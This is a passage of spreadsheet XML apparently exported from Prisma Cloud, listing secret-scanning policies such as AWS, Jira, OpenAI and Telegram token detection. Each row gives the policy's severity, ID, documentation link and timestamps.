      <c r="Q515" t="inlineStr"/>
      <c r="R515" t="inlineStr"/>
      <c r="S515" t="inlineStr"/>
      <c r="T515" t="b">
        <v>0</v>
      </c>
      <c r="U515" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V515" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W515" t="inlineStr">
        <is>
          <t>Jira Token</t>
        </is>
      </c>
      <c r="X515" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-51</t>
        </is>
      </c>
      <c r="Y515" t="inlineStr"/>
      <c r="Z515" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA515" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB515" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC515" t="inlineStr">
        <is>
          <t>CKV_SECRET_51</t>
        </is>
      </c>
      <c r="AD515" t="b">
        <v>1</v>
      </c>
      <c r="AE515" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF515" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>afa159db-75a7-451c-9731-9a353c6e6a78</t>
        </is>
      </c>
      <c r="AI515" t="inlineStr"/>
      <c r="AJ515" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK515" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" t="inlineStr"/>
      <c r="B516" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C516" s="2" t="inlineStr"/>
      <c r="D516" t="inlineStr"/>
      <c r="E516" t="inlineStr"/>
      <c r="F516" t="inlineStr"/>
      <c r="G516" t="b">
        <v>0</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J516" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K516" t="inlineStr">
        <is>
          <t>AWS Access Key detected in code</t>
        </is>
      </c>
      <c r="L516" t="inlineStr"/>
      <c r="M516" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N516" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O516" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P516" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q516" t="inlineStr"/>
      <c r="R516" t="inlineStr"/>
      <c r="S516" t="inlineStr"/>
      <c r="T516" t="b">
        <v>0</v>
      </c>
      <c r="U516" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V516" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W516" t="inlineStr">
        <is>
          <t>AWS Access Keys</t>
        </is>
      </c>
      <c r="X516" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-2</t>
        </is>
      </c>
      <c r="Y516" t="inlineStr"/>
      <c r="Z516" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA516" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB516" t="inlineStr">
        <is>
          <t>2024-11-13 15:33:08</t>
        </is>
      </c>
      <c r="AC516" t="inlineStr">
        <is>
          <t>CKV_SECRET_2</t>
        </is>
      </c>
      <c r="AD516" t="b">
        <v>1</v>
      </c>
      <c r="AE516" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF516" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>a98f67ca-d303-4bd5-b31b-88ef2d894b2f</t>
        </is>
      </c>
      <c r="AI516" t="inlineStr"/>
      <c r="AJ516" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK516" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" t="inlineStr"/>
      <c r="B517" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C517" s="2" t="inlineStr"/>
      <c r="D517" t="inlineStr"/>
      <c r="E517" t="inlineStr"/>
      <c r="F517" t="inlineStr"/>
      <c r="G517" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J517" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K517" t="inlineStr">
        <is>
          <t>Docker Swarm Join Token detected in code</t>
        </is>
      </c>
      <c r="L517" t="inlineStr"/>
      <c r="M517" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N517" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O517" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P517" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q517" t="inlineStr"/>
      <c r="R517" t="inlineStr"/>
      <c r="S517" t="inlineStr"/>
      <c r="T517" t="b">
        <v>0</v>
      </c>
      <c r="U517" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V517" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W517" t="inlineStr">
        <is>
          <t>Docker Swarm Join Token</t>
        </is>
      </c>
      <c r="X517" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-89</t>
        </is>
      </c>
      <c r="Y517" t="inlineStr"/>
      <c r="Z517" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA517" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB517" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC517" t="inlineStr">
        <is>
          <t>CKV_SECRET_89</t>
        </is>
      </c>
      <c r="AD517" t="b">
        <v>1</v>
      </c>
      <c r="AE517" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF517" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>ff3c629c-9be1-4912-adde-01d077e8ba72</t>
        </is>
      </c>
      <c r="AI517" t="inlineStr"/>
      <c r="AJ517" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK517" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" t="inlineStr"/>
      <c r="B518" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C518" s="2" t="inlineStr"/>
      <c r="D518" t="inlineStr"/>
      <c r="E518" t="inlineStr"/>
      <c r="F518" t="inlineStr"/>
      <c r="G518" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J518" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K518" t="inlineStr">
        <is>
          <t>Zapier webhook url detected in code</t>
        </is>
      </c>
      <c r="L518" t="inlineStr"/>
      <c r="M518" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N518" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O518" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P518" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q518" t="inlineStr"/>
      <c r="R518" t="inlineStr"/>
      <c r="S518" t="inlineStr"/>
      <c r="T518" t="b">
        <v>0</v>
      </c>
      <c r="U518" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V518" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W518" t="inlineStr">
        <is>
          <t>Zapier webhook url</t>
        </is>
      </c>
      <c r="X518" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-254</t>
        </is>
      </c>
      <c r="Y518" t="inlineStr"/>
      <c r="Z518" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA518" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB518" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC518" t="inlineStr">
        <is>
          <t>CKV_SECRET_254</t>
        </is>
      </c>
      <c r="AD518" t="b">
        <v>1</v>
      </c>
      <c r="AE518" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF518" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>dc77d6d8-4dda-45e9-9fa2-5af5ae2522b7</t>
        </is>
      </c>
      <c r="AI518" t="inlineStr"/>
      <c r="AJ518" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK518" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" t="inlineStr"/>
      <c r="B519" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C519" s="2" t="inlineStr"/>
      <c r="D519" t="inlineStr"/>
      <c r="E519" t="inlineStr"/>
      <c r="F519" t="inlineStr"/>
      <c r="G519" t="b">
        <v>1</v>
      </c>
      <c r="H5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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J519" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K519" t="inlineStr">
        <is>
          <t>Yahoo OAuth2 Keys detected in code</t>
        </is>
      </c>
      <c r="L519" t="inlineStr"/>
      <c r="M519" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N519" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O519" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P519" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q519" t="inlineStr"/>
      <c r="R519" t="inlineStr"/>
      <c r="S519" t="inlineStr"/>
      <c r="T519" t="b">
        <v>0</v>
      </c>
      <c r="U519" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V519" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W519" t="inlineStr">
        <is>
          <t>Yahoo OAuth2 Keys</t>
        </is>
      </c>
      <c r="X519" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-184</t>
        </is>
      </c>
      <c r="Y519" t="inlineStr"/>
      <c r="Z519" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA519" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB519" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC519" t="inlineStr">
        <is>
          <t>CKV_SECRET_184</t>
        </is>
      </c>
      <c r="AD519" t="b">
        <v>1</v>
      </c>
      <c r="AE519" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF519" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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19" t="inlineStr">
        <is>
          <t>a774c432-973f-4181-b1ad-a09351107816</t>
        </is>
      </c>
      <c r="AI519" t="inlineStr"/>
      <c r="AJ519" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK519" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" t="inlineStr"/>
      <c r="B520" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C520" s="2" t="inlineStr"/>
      <c r="D520" t="inlineStr"/>
      <c r="E520" t="inlineStr"/>
      <c r="F520" t="inlineStr"/>
      <c r="G520" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J520" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K520" t="inlineStr">
        <is>
          <t>OpenAI API Key detected in code</t>
        </is>
      </c>
      <c r="L520" t="inlineStr"/>
      <c r="M520" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N520" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O520" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P520" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q520" t="inlineStr"/>
      <c r="R520" t="inlineStr"/>
      <c r="S520" t="inlineStr"/>
      <c r="T520" t="b">
        <v>0</v>
      </c>
      <c r="U520" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V520" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W520" t="inlineStr">
        <is>
          <t>OpenAI API Key</t>
        </is>
      </c>
      <c r="X520" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-107</t>
        </is>
      </c>
      <c r="Y520" t="inlineStr"/>
      <c r="Z520" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA520" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB520" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC520" t="inlineStr">
        <is>
          <t>CKV_SECRET_107</t>
        </is>
      </c>
      <c r="AD520" t="b">
        <v>1</v>
      </c>
      <c r="AE520" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF520" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
          <t>537e8267-4c63-46d5-a563-aa44e8698534</t>
        </is>
      </c>
      <c r="AI520" t="inlineStr"/>
      <c r="AJ520" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK520" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" t="inlineStr"/>
      <c r="B521" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C521" s="2" t="inlineStr"/>
      <c r="D521" t="inlineStr"/>
      <c r="E521" t="inlineStr"/>
      <c r="F521" t="inlineStr"/>
      <c r="G521" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J521" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K521" t="inlineStr">
        <is>
          <t>Google Cloud Keys detected in code</t>
        </is>
      </c>
      <c r="L521" t="inlineStr"/>
      <c r="M521" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N521" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O521" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P521" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q521" t="inlineStr"/>
      <c r="R521" t="inlineStr"/>
      <c r="S521" t="inlineStr"/>
      <c r="T521" t="b">
        <v>0</v>
      </c>
      <c r="U521" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V521" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W521" t="inlineStr">
        <is>
          <t>Google Cloud Keys</t>
        </is>
      </c>
      <c r="X521" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-45</t>
        </is>
      </c>
      <c r="Y521" t="inlineStr"/>
      <c r="Z521" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA521" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB521" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC521" t="inlineStr">
        <is>
          <t>CKV_SECRET_45</t>
        </is>
      </c>
      <c r="AD521" t="b">
        <v>1</v>
      </c>
      <c r="AE521" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF521" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>9d1b426e-4498-4660-a34f-8a43beb0a2b7</t>
        </is>
      </c>
      <c r="AI521" t="inlineStr"/>
      <c r="AJ521" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK521" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" t="inlineStr"/>
      <c r="B522" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C522" s="2" t="inlineStr"/>
      <c r="D522" t="inlineStr"/>
      <c r="E522" t="inlineStr"/>
      <c r="F522" t="inlineStr"/>
      <c r="G522" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J522" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K522" t="inlineStr">
        <is>
          <t>SendGrid Key detected in code</t>
        </is>
      </c>
      <c r="L522" t="inlineStr"/>
      <c r="M522" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N522" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O522" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P522" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q522" t="inlineStr"/>
      <c r="R522" t="inlineStr"/>
      <c r="S522" t="inlineStr"/>
      <c r="T522" t="b">
        <v>0</v>
      </c>
      <c r="U522" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V522" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W522" t="inlineStr">
        <is>
          <t>SendGrid Key</t>
        </is>
      </c>
      <c r="X522" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-87</t>
        </is>
      </c>
      <c r="Y522" t="inlineStr"/>
      <c r="Z522" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA522" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB522" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC522" t="inlineStr">
        <is>
          <t>CKV_SECRET_87</t>
        </is>
      </c>
      <c r="AD522" t="b">
        <v>1</v>
      </c>
      <c r="AE522" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF522" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>53f06c2d-7061-4f54-a8ba-a2de2db2e790</t>
        </is>
      </c>
      <c r="AI522" t="inlineStr"/>
      <c r="AJ522" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK522" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" t="inlineStr"/>
      <c r="B523" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C523" s="2" t="inlineStr"/>
      <c r="D523" t="inlineStr"/>
      <c r="E523" t="inlineStr"/>
      <c r="F523" t="inlineStr"/>
      <c r="G523" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J523" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K523" t="inlineStr">
        <is>
          <t>Vault Unseal Key detected in code</t>
        </is>
      </c>
      <c r="L523" t="inlineStr"/>
      <c r="M523" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N523" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O523" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P523" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q523" t="inlineStr"/>
      <c r="R523" t="inlineStr"/>
      <c r="S523" t="inlineStr"/>
      <c r="T523" t="b">
        <v>0</v>
      </c>
      <c r="U523" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V523" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W523" t="inlineStr">
        <is>
          <t>Vault Unseal Key</t>
        </is>
      </c>
      <c r="X523" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-71</t>
        </is>
      </c>
      <c r="Y523" t="inlineStr"/>
      <c r="Z523" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA523" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB523" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC523" t="inlineStr">
        <is>
          <t>CKV_SECRET_71</t>
        </is>
      </c>
      <c r="AD523" t="b">
        <v>1</v>
      </c>
      <c r="AE523" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF523" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>d29f067e-31c9-44a2-b4e0-90a25b8595e1</t>
        </is>
      </c>
      <c r="AI523" t="inlineStr"/>
      <c r="AJ523" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK523" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" t="inlineStr"/>
      <c r="B524" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C524" s="2" t="inlineStr"/>
      <c r="D524" t="inlineStr"/>
      <c r="E524" t="inlineStr"/>
      <c r="F524" t="inlineStr"/>
      <c r="G524" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J524" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K524" t="inlineStr">
        <is>
          <t>Telegram Bot Token detected in code</t>
        </is>
      </c>
      <c r="L524" t="inlineStr"/>
      <c r="M524" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N524" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O524" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P524" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q524" t="inlineStr"/>
      <c r="R524" t="inlineStr"/>
      <c r="S524" t="inlineStr"/>
      <c r="T524" t="b">
        <v>0</v>
      </c>
      <c r="U524" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V524" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W524" t="inlineStr">
        <is>
          <t>Telegram Bot Token</t>
        </is>
      </c>
      <c r="X524" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-68</t>
        </is>
      </c>
      <c r="Y524" t="inlineStr"/>
      <c r="Z524" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA524" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB524" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC524" t="inlineStr">
        <is>
          <t>CKV_SECRET_68</t>
        </is>
      </c>
      <c r="AD524" t="b">
        <v>1</v>
      </c>
      <c r="AE524" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF524" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>bbe5b7b7-00e1-4c4f-8838-02d913a3df11</t>
        </is>
      </c>
      <c r="AI524" t="inlineStr"/>
      <c r="AJ524" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK524" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" t="inlineStr"/>
      <c r="B525" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C525" s="2" t="inlineStr"/>
      <c r="D525" t="inlineStr"/>
      <c r="E525" t="inlineStr"/>
      <c r="F525" t="inlineStr"/>
      <c r="G525" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J525" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K525" t="inlineStr">
        <is>
          <t>Splunk User Credential detected in code</t>
        </is>
      </c>
      <c r="L525" t="inlineStr"/>
      <c r="M525" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N525" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O525" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P525" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q525" t="inlineStr"/>
      <c r="R525" t="inlineStr"/>
      <c r="S525" t="inlineStr"/>
      <c r="T525" t="b">
        <v>0</v>
      </c>
      <c r="U525" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V525" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W525" t="inlineStr">
        <is>
          <t>Splunk User Credentials</t>
        </is>
      </c>
      <c r="X525" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-66</t>
        </is>
      </c>
      <c r="Y525" t="inlineStr"/>
      <c r="Z525" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA525" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB525" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC525" t="inlineStr">
        <is>
          <t>CKV_SECRET_66</t>
        </is>
      </c>
      <c r="AD525" t="b">
        <v>1</v>
      </c>
      <c r="AE525" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF525" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>6933e817-4991-4f9d-9bbf-b11bacfc8c29</t>
        </is>
      </c>
      <c r="AI525" t="inlineStr"/>
      <c r="AJ525" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK525" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" t="inlineStr"/>
      <c r="B526" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C526" s="2" t="inlineStr"/>
      <c r="D526" t="inlineStr"/>
      <c r="E526" t="inlineStr"/>
      <c r="F526" t="inlineStr"/>
      <c r="G526" t="b">
        <v>1</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
